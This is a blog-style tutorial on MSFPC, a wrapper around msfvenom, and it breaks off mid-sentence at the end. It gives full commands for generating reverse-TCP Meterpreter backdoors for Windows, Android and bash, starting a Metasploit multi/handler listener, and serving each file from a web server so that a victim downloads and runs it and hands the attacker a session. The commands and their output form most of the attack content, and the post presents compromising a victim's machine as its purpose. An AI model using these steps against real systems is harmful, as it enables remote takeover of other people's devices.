Hello Friends!!
As you all are aware of MSFvenom-A tool in Kali linux for generating payload, is also available as MSFvenom Payload Creator (MSFPC) for generating various “basic” Meterpreter payloads viamsfvenom. It is fully automating msfvenom & Metasploit is the end goal.
MSFvenom Payload Creator (MSFPC)is a wrapper to generate multiple types of payloads, based on user’s choice. The idea is to be as simple as possible ( only requiring one input ) to produce their payload.
Source: https://github.com/g0tmi1k/mpc
Author: g0tmi1k
Syntax
msfpc <TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>) Create a Payload with Interactive IP ModeLet’s create the payload for windows platform with the help of following command
msfpc windowsWhen you will enter above command it will automatically confirm the interface:
Which interface should be used?
eth0, lo wan
We press 1 for eth0 and then it will start generating payload and as result give us following:
Location ofMSF handler file and windows meterpreter created. Command to be run to start multi handler automatically within metasploit framework. Command for file transfer through web server.
Basically the msfpc is design to reduce the user’s effort in generating payload of various platforms with different-different format of file. So when you will type “ msfpc ” it will display all types of platform and generate a specific format of file likewise.
Syntax:msfpc <platform-type> <Lhost IP> <Lport>
Windows Payload
If you want to generate a payload to get meterpreter session victim’s machine which operates on Windows, then all you need to do is type following:
msfpc windows 192.168.1.109 1234If you will not mention IP, it will automatically ask to choose interface as discussed above and choose 443 as default lport. It creates a malicious backdoor in the .exe format for 32-bit architecture. Then it will start generating the payload and as result give us details following details.
Location ofMSF handler file and windows meterpreter created: ‘/root/windows-meterpreter-staged-reverse-tcp-1234.exe’ command to be run to start multi handler automatically: msfconsole -q -r ‘/root/windows-meterpreter-staged-reverse-tcp-1234-exe.rc’ Command for file transfer through web server: python2 -m SimpleHTTPServer 8080
Now run the following command to launch multi/handler and web server for file transfer.
msfconsole -q -r '/root/windows-meterpreter-staged-reverse-tcp-1234-exe.rc' python2 -m SimpleHTTPServer 8080
When victim will browse the following URL where it will ask to download and run the .exe file that will provide meterpreter session to the attacker.
http://192.168.1.109/root/windows-meterpreter-staged-reverse-tcp-1234.exeConclusion:Earlier the attackerswere usingmanual method to generate a payload viamsfvenom command and then useMetasploitmodule “multi/handler” to access the reverse connection viameterpretersession and thistechniquewas quite successfully approach to compromisea victim’s machinealthough took much time. But same approach isapplicablewith the help of MSFPC for generating various “basic” Meterpreter payloads viamsfvenom.
Android Payload
If you want to generate a payload to get meterpreter session victim’s machine which operates on Android, then all you need to do is type following:
msfpc apk 192.168.1.109 1234It creates a malicious backdoor in the .apk format . Then it will start generating the payload and as result give us following details.
Location ofMSF handler file and android meterpreter created: ‘/root/android-meterpreter-stageless-reverse-tcp-1234.apk’ Command to be run to start multi handler automatically: msfconsole -q -r ‘/root/android-meterpreter-stageless-reverse-tcp-1234.apk.rc’ Command for file transfer through web server: python2 -m SimpleHTTPServer 8080
Now run the following command to launch multi/handler and web server for file transfer.
msfconsole -q -r '/root/android-meterpreter-stageless-reverse-tcp-1234.apk.rc' python2 -m SimpleHTTPServer 8080When victim will browse the following URL where it will ask to install the application and run the .apk file that will provide meterpreter session to the attacker.
http://192.168.1.109/root/android-meterpreter-stageless-reverse-tcp-1234.apk
Hence you can observe as said above, we have meterpreter session of target’s machine.
BASH
Theproabove MSFPC is that itreducesthe stress to remember the format for each platform, all we need to do is just follow the above declare syntax andthe restwill bemanagedby MSFPC automatically. Suppose I want to create a payload for Bashplatform, and thenit will takea few minutesin MSFPC to generate a bash payload.
msfpc bash 192.168.1.109 1234It creates a malicious backdoor in the .sh format . Then it will start generating the payload and as result give us following:
Location ofMSF handler file and bash meterpreter created: ‘/root/bash-shell-staged-reverse-tcp-1234.sh.’ Command to be run to start multi handler automatically: msfconsole -q -r ‘/root/bash-shell-staged-reverse-tcp-1234.sh.rc’ Command for file transfer through web server: python2 -m SimpleHTTPServer 8080
Now run the following command to launch multi/handler and web server for file transfer.
msfconsole -q -r '/root/bash-shell-staged-reverse-tcp-1234.sh.rc' python2 -m SimpleHTTPServer 8080 When victim will browse the following URL where it will ask to install the script and once the target run the bash script with full permission, it will